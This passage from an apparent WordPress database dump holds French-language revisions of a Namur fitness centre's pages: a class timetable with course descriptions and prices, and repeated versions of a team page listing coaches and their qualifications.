class=\"tcardio\"><b>19h00</b>\r\nCARDIO</td>\r\n<td class=\"trip\"><b>19h00</b>\r\nRIP-KETTLE</td>\r\n<td class=\"trip\"><b>12h30</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tcardio\"><b>12h30</b>\r\nCARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"trip\"><b>19h45</b>\r\nRIP-KETTLE</td>\r\n<td class=\"tglfe\"><b>19h45</b>\r\nCircuit</td>\r\n<td class=\"tzumba\"><b>19h45</b>\r\n<img class=\"size-full wp-image-409 aligncenter\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /></td>\r\n<td class=\"tcardio\"><b>19h45</b>\r\nCARDIO</td>\r\n<td class=\"tcellule\"></td>\r\n<td class=\"tcellule\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline; background: #E6E6E6;\"><strong>Circuit :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5A9;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline; background: #A9F5F2;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n\r\n<img class=\"size-full wp-image-409 alignleft\" alt=\"zumba3\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/11/zumba3.jpg\" width=\"70\" height=\"24\" /> :<strong>La Zumba® </strong>est un mix de plusieurs danses latines (salsa, merengue, cumbia, reggaeton…), de fitness et d\'aérobie qui reste accessible à tout le monde quel que soit son niveau.\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\" target=\"_blank\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Namur :</h2>\r\n<a title=\"Contact\" href=\"http://www2.crosstrainingcenter.be/contact-2/\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Namur', '', 'inherit', 'open', 'open', '', '363-revision-v1', '', '', '2014-01-18 19:11:50', '2014-01-18 19:11:50', '', 363, 'http://www.crosstrainingcenter.be/363-revision-v1/', 0, 'revision', '', 0),
(420, 1, '2014-01-20 20:38:05', '2014-01-20 20:38:05', '', 'youssra_boujat_pti', '', 'inherit', 'open', 'open', '', 'youssra_boujat_pti', '', '', '2014-01-20 20:38:05', '2014-01-20 20:38:05', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(421, 1, '2014-01-20 20:38:29', '2014-01-20 20:38:29', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"198\" height=\"258\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2></h2>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-01-20 20:38:29', '2014-01-20 20:38:29', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(422, 1, '2014-01-20 20:39:28', '2014-01-20 20:39:28', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-402\" alt=\"julie_rogge_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/julie_rogge_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-01-20 20:39:28', '2014-01-20 20:39:28', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(423, 1, '2014-01-20 20:40:16', '2014-01-20 20:40:16', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et 